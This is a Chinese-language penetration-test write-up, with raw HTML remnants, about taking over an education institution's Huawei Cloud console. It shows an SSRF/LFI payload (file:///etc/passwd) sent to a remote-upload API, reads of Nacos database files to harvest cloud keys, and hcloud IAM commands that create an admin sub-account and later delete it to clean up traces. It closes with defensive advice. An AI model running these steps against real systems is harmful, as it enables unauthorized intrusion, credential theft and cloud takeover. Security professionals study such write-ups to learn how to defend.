从LFI到云控制台接管：教育证书站渗透测试实战教学<\/h1>

1. 信息收集阶段<\/h2>

1.1 目标定位<\/h3>

使用Hunter.io等工具搜索教育机构(.edu)的SRC证书站点<\/li>

通过JavaScript文件分析发现API路径（三个带api关键字的路径）<\/li> <\/ul>

1.2 API接口发现<\/h3>

扫描发现其中一个接口路径下有api-doc文档<\/li>
使用APIFox工具导入API文档进行测试<\/li>

发现远程文件上传接口，允许通过远程URL上传文件<\/li> <\/ul>

2. 漏洞利用阶段<\/h2>

2.1 本地文件包含(LFI)漏洞<\/h3>

利用远程文件上传功能实现任意文件读取：

POST \/api\/upload\/remote
{
  "url": "file:\/\/\/etc\/passwd"
}
<\/code><\/pre>
<\/li>
服务器抓取文件内容后作为图片上传到MinIO<\/li>
通过访问图片URL获取文件内容<\/li>
<\/ul>
2.2 系统文件读取<\/h3>

读取\/var\/lib\/mlocate\/mlocate.db<\/code>获取文件目录结构<\/li>
分析mlocate.db发现高价值信息：

Nacos配置中心<\/li>
MySQL数据库文件<\/li>
各种配置文件(.properties)<\/li>
<\/ul>
<\/li>
<\/ul>
2.3 Nacos配置中心渗透<\/h3>

从.properties文件获取Nacos的MySQL密码<\/li>
读取Nacos数据库文件：

\/var\/lib\/mysql\/nacos\/users.ibd<\/code> - 存储Nacos平台用户凭证<\/li>
\/var\/lib\/mysql\/nacos_config\/config_info.ibd<\/code> - 存储服务配置信息<\/li>
<\/ul>
<\/li>
从数据库中发现：

OSS的AK\/SK（高权限账户）<\/li>
学校公网MinIO的AK\/SK（管理端在内网）<\/li>
OpenAI API密钥<\/li>
MongoDB连接信息<\/li>
SMS平台凭证<\/li>
<\/ul>
<\/li>
<\/ol>
3. 云控制台接管<\/h2>
3.1 利用高权限OSS AK\/SK<\/h3>

验证AK\/SK权限级别（发现是高权限账户）<\/li>
使用华为云CLI工具操作：
# 导入AK\/SK<\/span>
<\/span><\/span>export HW_ACCESS_KEY_ID=<\/span>your_access_key
<\/span><\/span>export HW_SECRET_ACCESS_KEY=<\/span>your_secret_key
<\/span><\/span>
<\/span><\/span># 创建子账户<\/span>
<\/span><\/span>hcloud IAM CreateUser --user_name=<\/span>pentest_user
<\/span><\/span># 记住返回的用户ID<\/span>
<\/span><\/span>
<\/span><\/span># 列出组并获取管理员组ID<\/span>
<\/span><\/span>hcloud IAM ListGroups
<\/span><\/span>
<\/span><\/span># 将用户添加到管理组<\/span>
<\/span><\/span>hcloud IAM AddUserToGroup --group_id=<\/span>admin_group_id --user_id=<\/span>user_id
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
3.2 控制台登录<\/h3>

获取租户名：
hcloud IAM ShowAccount
<\/span><\/span><\/code><\/pre><\/li>
使用租户名+子账户登录华为云控制台<\/li>
<\/ol>
3.3 资产发现<\/h3>

发现混合云架构：

入口机器在教育机构内网<\/li>
MongoDB集群在华为云上<\/li>
<\/ul>
<\/li>
验证方法：

通过LFI访问DNSlog验证出口IP（显示为.edu出口）<\/li>
尝试访问元数据服务确认是否云主机<\/li>
<\/ul>
<\/li>
<\/ul>
4. 清理痕迹<\/h2>

删除创建的子账户：
hcloud IAM DeleteUser --user_id=<\/span>user_id
<\/span><\/span><\/code><\/pre><\/li>
<\/ul>
5. 关键知识点总结<\/h2>


API接口安全<\/strong>：<\/p>

远程文件上传功能未做严格校验导致LFI<\/li>
API文档暴露增加了攻击面<\/li>
<\/ul>
<\/li>

配置管理安全<\/strong>：<\/p>

Nacos配置中心暴露敏感信息<\/li>
数据库文件权限配置不当<\/li>
<\/ul>
<\/li>

云安全最佳实践<\/strong>：<\/p>

高权限AK\/SK不应存储在配置中心<\/li>
应启用多因素认证和权限最小化原则<\/li>
监控异常子账户创建行为<\/li>
<\/ul>
<\/li>

混合云安全<\/strong>：<\/p>

内网系统与云服务互联时的安全边界<\/li>
跨云网络访问控制<\/li>
<\/ul>
<\/li>
<\/ol>
6. 防御建议<\/h2>


API安全<\/strong>：<\/p>

实施严格的输入验证<\/li>
禁用危险的URL协议(file:\/\/)<\/li>
实施权限控制和速率限制<\/li>
<\/ul>
<\/li>

配置管理<\/strong>：<\/p>

加密敏感配置信息<\/li>
限制配置文件的访问权限<\/li>
定期轮换凭证<\/li>
<\/ul>
<\/li>

云安全<\/strong>：<\/p>

使用临时凭证而非长期AK\/SK<\/li>
实施严格的IAM策略<\/li>
启用异常操作告警<\/li>
<\/ul>
<\/li>

系统加固<\/strong>：<\/p>

限制对系统文件的读取权限<\/li>
定期更新mlocate数据库权限<\/li>
隔离关键服务网络<\/li>
<\/ul>
<\/li>
<\/ol>
通过本案例可以看到，从一个小小的LFI漏洞开始，通过系统性的信息收集和横向移动，最终可能导致整个云环境的控制权丢失。这强调了纵深防御和安全开发生命周期的重要性。<\/p>